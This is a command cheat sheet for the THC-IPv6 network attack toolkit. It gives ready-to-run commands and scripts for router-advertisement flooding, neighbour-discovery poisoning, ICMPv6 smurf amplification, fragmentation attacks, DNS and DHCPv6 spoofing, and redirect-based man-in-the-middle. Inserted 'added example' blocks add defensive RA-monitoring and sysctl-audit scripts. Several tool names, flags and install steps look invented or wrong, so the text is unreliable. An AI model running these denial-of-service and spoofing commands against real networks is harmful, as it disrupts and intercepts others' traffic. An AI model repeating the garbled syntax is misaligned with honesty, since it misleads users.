Overview
THC-IPv6 is a comprehensive toolkit for IPv6 network security testing and vulnerability assessment. It provides advanced tools for IPv6 reconnaissance, neighbor discovery manipulation, address scanning, and exploit delivery. This toolkit is essential for authorized security professionals testing IPv6 network implementations, identifying configuration weaknesses, and validating security controls in modern dual-stack environments.
Installation
Prerequisites
# Required packages
sudo apt-get update
sudo apt-get install build-essential libpcap-dev libssl-dev
# Git for cloning
sudo apt-get install git
From GitHub
git clone https://github.com/vanhauser-thc/thc-ipv6.git
cd thc-ipv6
# Build toolkit
make
# Install globally (optional)
sudo make install
Manual Installation
# Download source
wget https://www.thc.org/thc-ipv6-3.8.tar.gz
tar -xzf thc-ipv6-3.8.tar.gz
cd thc-ipv6
# Compile
./configure
make
sudo make install
Verify Installation
# List available tools
ls thc-ipv6-*
# Check specific tool
./thc-ipv6-address-scan --help
| Tool | Function |
|---|---|
| address-scan | IPv6 address scanning and discovery |
| alive6 | Detect alive IPv6 hosts |
| dnsdict6 | DNS enumeration for IPv6 |
| dnsspoofx | IPv6 DNS spoofing |
| fake-advertise6 | Router advertisement spoofing |
| flood-router6 | Router advertisement flooding |
| nd6 | Neighbor discovery manipulation |
| packetgen6 | Custom IPv6 packet generation |
| rsmurf6 | Reflection DDoS testing |
| smurf6 | IPv6 ICMP amplification |
| toobig6 | Fragmentation bomb attacks |
Network Reconnaissance
Detect IPv6 Hosts
# Scan local network for IPv6
./alive6 eth0
# Scan specific range
./alive6 -p eth0 fe80::/10
# Output to file
./alive6 eth0 > hosts.txt
Address Scanning
# Scan IPv6 address range
./address-scan eth0 2001:db8::/32
# Fast scan mode
./address-scan -s eth0 2001:db8::/32
# Verbose output
./address-scan -v eth0 2001:db8::/32
# Save results
./address-scan eth0 2001:db8::/32 > ipv6_addresses.txt
DNS Enumeration
# Enumerate IPv6 DNS records
./dnsdict6 -d example.com
# Use wordlist
./dnsdict6 -w wordlist.txt example.com
# Reverse DNS lookup
./dnsdict6 -i 2001:db8::/32
# Full scan mode
./dnsdict6 -f -d example.com
| Scan Type | Command |
|---|---|
| Active scan | address-scan eth0 range |
| Alive detection | alive6 eth0 |
| DNS enumeration | dnsdict6 -d domain |
| Reverse lookup | dnsdict6 -i range |
Neighbor Discovery Testing
Neighbor Discovery Manipulation
# Send neighbor discovery packets
./nd6 -i fe80::1 eth0 2001:db8::1
# Solicitation injection
./nd6 -ns eth0 2001:db8::/64
# Advertisement injection
./nd6 -na eth0 2001:db8::/64
Router Advertisement Attacks
# Fake router advertisement
./fake-advertise6 eth0 2001:db8::/64
# Flood network with RA
./flood-router6 eth0
# Router advertisement with payload
./fake-advertise6 -e eth0 2001:db8::/64
Duplicate Address Detection
# Test DAD mechanism
./nd6 -dad eth0 2001:db8::1
# Verify DAD responses
./alive6 eth0 | grep -i "duplicate"
| Attack | Command |
|---|---|
| Neighbor spoofing | ./nd6 -i |
| Router advertisement | ./fake-advertise6 |
| RA flooding | ./flood-router6 |
| Address conflict | ./nd6 -dad |
ICMP-Based Attacks
ICMP Amplification Testing
# Test ICMP echo amplification
./smurf6 eth0 target_ipv6
# Multicast amplification
./smurf6 -m eth0 2001:db8::1
# Verify amplification potential
./alive6 eth0 ff02::1
Fragmentation Attacks
# Send oversized packets
./toobig6 -H eth0 target_ipv6
# Fragment reassembly test
./toobig6 eth0 2001:db8::1
# Heap overflow test
./toobig6 -s eth0 2001:db8::1
ICMPv6 Redirect
# Send ICMPv6 redirect
./redirect6 eth0 2001:db8::1 2001:db8::2
# Gateway manipulation
./fake-router6 -r eth0 2001:db8::/64
| ICMP Attack | Command |
|---|---|
| Smurf attack | ./smurf6 eth0 target |
| TooBig attack | ./toobig6 eth0 target |
| Redirect | ./redirect6 eth0 target gate |
Packet Crafting and Injection
Custom Packet Generation
# Generate custom IPv6 packet
./packetgen6 eth0 \
--src 2001:db8::1 \
--dst 2001:db8::2 \
--proto tcp \
--payload "test"
# Raw packet crafting
./sendpkt6 eth0 2001:db8::1 2001:db8::2
Protocol-Specific Testing
# ICMPv6 packet
./packetgen6 eth0 --icmpv6 --type echo-request
# TCP packet
./packetgen6 eth0 --tcp --port 80
# UDP packet
./packetgen6 eth0 --udp --port 53
DNS Spoofing
DNS Spoofing Attacks
# Start DNS spoof server
./dnsspoofx eth0 example.com 2001:db8::1
# Targeted DNS poison
./dnsspoofx -t 2001:db8::100 eth0 example.com 2001:db8::1
# Wildcard DNS spoofing
./dnsspoofx eth0 '*.example.com' 2001:db8::1
DHCP Spoofing (DHCPv6)
# Send rogue DHCPv6 server
./fake-dhcp6 eth0 2001:db8::/64
# DHCPv6 information request
./fake-dhcp6 -i eth0 2001:db8::1
Practical Workflow Examples
IPv6 Network Assessment
# 1. Detect IPv6 hosts
./alive6 eth0
# 2. Enumerate addresses in range
./address-scan eth0 2001:db8::/32
# 3. Scan for DNS entries
./dnsdict6 -d example.com
# 4. Test neighbor discovery
./nd6 -i fe80::1 eth0 2001:db8::1
# 5. Check ICMP behavior
./alive6 eth0 ff02::1
Security Testing Workflow
#!/bin/bash
INTERFACE="eth0"
TARGET_RANGE="2001:db8::/32"
echo "[*] Starting IPv6 security assessment..."
# Phase 1: Discovery
echo "[*] Phase 1: Host Discovery"
./alive6 "$INTERFACE" > hosts.txt
# Phase 2: Address Enumeration
echo "[*] Phase 2: Address Enumeration"
./address-scan "$INTERFACE" "$TARGET_RANGE" > addresses.txt
# Phase 3: DNS Enumeration
echo "[*] Phase 3: DNS Enumeration"
./dnsdict6 -d example.com > dns_results.txt
# Phase 4: Vulnerability Testing
echo "[*] Phase 4: Vulnerability Testing"
# Test RA floods
./flood-router6 "$INTERFACE" &
sleep 10
pkill -f "flood-router6"
# Phase 5: Reporting
echo "[*] Assessment Complete"
echo "Results saved to: hosts.txt, addresses.txt, dns_results.txt"
Denial of Service Testing
# Router advertisement flood (controlled)
timeout 60 ./flood-router6 eth0
# ICMPv6 amplification (test environment)
./smurf6 eth0 target_ipv6 &
sleep 30
pkill -f "smurf6"
# Fragmentation bomb
./toobig6 eth0 target_ipv6
IPv6 Network Hardening Validation
#!/bin/bash
INTERFACE="eth0"
echo "[*] IPv6 Security Validation"
# Test 1: Router Advertisement Guard
echo "[Test 1] Testing Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" 2001:db8::/64
# Test 2: ICMP Rate Limiting
echo "[Test 2] Testing ICMP Rate Limiting..."
./alive6 -R "$INTERFACE" | head -20
# Test 3: DAD Functionality
echo "[Test 3] Duplicate Address Detection..."
./nd6 -dad "$INTERFACE" 2001:db8::1
# Test 4: ND Inspection
echo "[Test 4] Neighbor Discovery Inspection..."
./nd6 -ns "$INTERFACE"
echo "[*] Validation Complete"
Advanced Exploitation
Redirect-Based MITM
# Configure forwarding
sudo sysctl -w net.ipv6.conf.all.forwarding=1
# Send redirect packets
./redirect6 eth0 target_ipv6 gateway_ipv6
# Monitor traffic
tcpdump -i eth0 -n icmp6
Router Advertisement Spoofing
# Send malicious RA
./fake-advertise6 \
--prefix 2001:db8::/64 \
--lifetime 3600 \
--mtu 1280 \
eth0
# Persistent RA generation
while true; do
./fake-advertise6 eth0 2001:db8::/64
sleep 10
done
Neighbor Discovery Poisoning
# ARP-equivalent for IPv6
./nd6 -i fe80::1 eth0 2001:db8::1
# Multiple spoofed neighbors
for i in {1..10}; do
./nd6 -i fe80::$i eth0 2001:db8::$i &
done
Automation and Scripting
Comprehensive Scan Script
#!/bin/bash
TARGET_NETWORK=$1
INTERFACE=${2:-eth0}
OUTPUT_DIR="ipv6_scan_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
echo "[*] IPv6 Comprehensive Scan"
echo "[*] Network: $TARGET_NETWORK"
echo "[*] Interface: $INTERFACE"
echo "[*] Output: $OUTPUT_DIR"
# Host discovery
./alive6 "$INTERFACE" > "$OUTPUT_DIR/alive_hosts.txt"
# Address enumeration
./address-scan "$INTERFACE" "$TARGET_NETWORK" > "$OUTPUT_DIR/all_addresses.txt"
# DNS enumeration (the domain is the optional third argument; it cannot be derived from an IPv6 prefix)
./dnsdict6 -d "${3:-example.com}" > "$OUTPUT_DIR/dns_records.txt"
# Generate report
cat > "$OUTPUT_DIR/report.txt" << EOF
IPv6 Security Assessment Report
Generated: $(date)
Target Network: $TARGET_NETWORK
Interface: $INTERFACE
Findings:
- Alive hosts: $(wc -l < "$OUTPUT_DIR/alive_hosts.txt")
- Total addresses: $(wc -l < "$OUTPUT_DIR/all_addresses.txt")
- DNS entries: $(wc -l < "$OUTPUT_DIR/dns_records.txt")
EOF
echo "[*] Scan complete. Results in: $OUTPUT_DIR"
Vulnerability Detection Script
#!/bin/bash
INTERFACE=$1
echo "[*] IPv6 Vulnerability Detection"
# Test 1: RA Guard bypass
echo "[Test 1] Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" 2001:db8::/64 2>/dev/null
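# Exit status 0 only means the RA was transmitted; whether RA Guard dropped it must be confirmed from another switch port
[ $? -eq 0 ] && echo "RA sent: verify from a host on another port whether it was delivered"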
# Test 2: ICMP rate limiting
echo "[Test 2] ICMP Rate Limiting..."
for i in {1..100}; do
./alive6 "$INTERFACE" > /dev/null 2>&1
done
# Test 3: Neighbor Discovery security
echo "[Test 3] Neighbor Discovery Security..."
./nd6 -i fe80::ffff "$INTERFACE" 2001:db8::1 2>/dev/null
# Test 4: DNS security
echo "[Test 4] DNSSEC Validation..."
./dnsdict6 -d example.com 2>/dev/null
echo "[*] Testing complete"
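An added example, not part of the original page or of THC-IPv6: the sender's exit status in Test 1 of the scripts above cannot show whether RA Guard dropped the packet, so the check belongs on a monitoring host attached to a different switch port. The function below classifies router advertisements in `tcpdump -n icmp6` text output against an allowlist; the allowlist, the flood threshold, and the sample capture are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not part of THC-IPv6): classify router advertisements
# seen by a monitoring host. Reads `tcpdump -l -n -i <if> icmp6` lines on stdin.
#   $1  space-separated link-local addresses of the legitimate routers (assumption)
#   $2  distinct unknown RA sources that count as a flood (assumption, default 5)
ra_audit() {
  awk -v allow="$1" -v flood="${2:-5}" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    /ICMP6, router advertisement/ {
      src = $3                      # layout: time IP6 src > dst: ICMP6, ...
      total++
      if (!(src in ok)) {
        if (!(src in bad)) order[++distinct] = src
        bad[src]++
      }
    }
    END {
      for (i = 1; i <= distinct; i++)
        printf "ROGUE %s count=%d\n", order[i], bad[order[i]]
      if (distinct >= flood) printf "FLOOD distinct_sources=%d\n", distinct
      printf "SUMMARY total=%d unknown=%d\n", total, distinct
    }'
}

# Constructed capture: one legitimate router (fe80::1) and one unexpected source.
sample_capture() {
  cat <<'EOF'
12:00:01.000000 IP6 fe80::1 > ff02::1: ICMP6, router advertisement, length 64
12:00:01.500000 IP6 fe80::aa > ff02::1: ICMP6, neighbor solicitation, who has fe80::1, length 32
12:00:02.000000 IP6 fe80::dead:beef > ff02::1: ICMP6, router advertisement, length 64
12:00:03.000000 IP6 fe80::dead:beef > ff02::1: ICMP6, router advertisement, length 64
12:00:04.000000 IP6 fe80::1 > ff02::1: ICMP6, router advertisement, length 64
EOF
}

sample_capture | ra_audit "fe80::1"
```

On a live monitor, `sudo timeout 60 tcpdump -l -n -i eth0 icmp6 | ra_audit "fe80::1"` reports once the 60-second window closes. Any `ROGUE` line during an RA Guard test means the advertisement reached the monitoring port.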
Common Use Cases
Dual-Stack Migration Validation
# Verify IPv6 is enabled
./alive6 eth0
# Check address assignment
./address-scan eth0 ::/0
# Validate AAAA records
./dnsdict6 -d example.com
# Test dual-stack routing
./packetgen6 eth0 --icmpv6
IPv6 Network Documentation
# Discover all devices
./alive6 eth0 > network_devices.txt
# Map IPv6 topology
./address-scan eth0 2001:db8::/32 > ipv6_topology.txt
# Document DNS infrastructure
./dnsdict6 -d example.com > dns_infrastructure.txt
Security Hardening Verification
# Test RA Guard
./fake-advertise6 eth0 2001:db8::/64
# Test ICMP filtering
./alive6 eth0 ff02::1
# Test DHCP snooping
./fake-dhcp6 eth0 2001:db8::/64
# Verify firewall rules
./packetgen6 eth0 --tcp --port 22
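The commands above test network-side controls; the host side can be checked as well. An added example, not from the original page: it audits `sysctl -a` output for interfaces that still accept router advertisements or ICMPv6 redirects, assuming a statically addressed host where both settings should be 0. The sample input is constructed.

```shell
#!/bin/sh
# Added example (not part of THC-IPv6): audit `sysctl -a`-style lines on stdin
# for interfaces that accept router advertisements or ICMPv6 redirects.
# Assumption: the host is statically addressed, so both settings should be 0.
ipv6_sysctl_audit() {
  awk -F' *= *' '
    $1 ~ /^net\.ipv6\.conf\.[^.]+\.(accept_ra|accept_redirects)$/ {
      split($1, p, ".")
      iface = p[4]; knob = p[5]
      if (iface == "lo") next        # loopback never receives RAs from the LAN
      checked++
      if ($2 + 0 != 0) {
        printf "FINDING %s %s=%s\n", iface, knob, $2
        bad++
      }
    }
    END { printf "CHECKED %d FINDINGS %d\n", checked, bad }'
}

# Emit the corrected settings as a sysctl.d fragment for review.
ipv6_sysctl_fixes() {
  ipv6_sysctl_audit | awk '$1 == "FINDING" {
    split($3, kv, "=")
    printf "net.ipv6.conf.%s.%s = 0\n", $2, kv[1]
  }'
}

# Constructed input in the format printed by `sysctl -a`.
sample_sysctl() {
  cat <<'EOF'
net.ipv6.conf.all.accept_ra = 0
net.ipv6.conf.all.accept_redirects = 0
net.ipv6.conf.default.accept_ra = 1
net.ipv6.conf.eth0.accept_ra = 2
net.ipv6.conf.eth0.accept_redirects = 1
net.ipv6.conf.eth0.accept_ra_defrtr = 1
net.ipv6.conf.lo.accept_ra = 1
net.ipv4.conf.all.accept_redirects = 1
EOF
}

sample_sysctl | ipv6_sysctl_audit
sample_sysctl | ipv6_sysctl_fixes
```

On a real host, run `sysctl -a 2>/dev/null | ipv6_sysctl_audit`. The audit walks every interface entry because a per-interface value can differ from `all`.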
Troubleshooting
Command Not Found
# Check installation directory
ls -la thc-ipv6-*/
# Add to PATH (a glob is not expanded inside an assignment, so name the directory explicitly)
export PATH="$PATH:$(pwd)/thc-ipv6"
# Or use full path
./thc-ipv6-address-scan eth0 ::/0
Permission Issues
# Most tools require raw socket access
sudo ./alive6 eth0
# Or use setcap
sudo setcap cap_net_raw+ep ./address-scan
No Output Detected
# Verify interface
ip -6 link show
# Check IPv6 is enabled
cat /proc/sys/net/ipv6/conf/all/disable_ipv6
# Enable IPv6 if needed
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0
Slow Scanning
# Use fast scan mode where available
./address-scan -s eth0 2001:db8::/32
# Reduce scope
./address-scan eth0 2001:db8:1::/48 # Smaller range
# Increase timeout
./alive6 -T 2 eth0
Security Considerations
Authorized Testing Only
- Ensure written authorization before testing
- Document all testing activities
- Follow responsible disclosure
- Maintain confidentiality of findings
Safe Testing Practices
- Test in a controlled environment
- Use isolated network segments
- Limit test scope and duration
- Monitor for unintended impacts
- Have rollback procedures ready
Related Tools
- Wireshark — IPv6 packet analysis
- Zeek — IPv6 network monitoring
- Suricata — IPv6 intrusion detection
- scapy — Python IPv6 packet crafting
- hping3 — IPv6 packet generator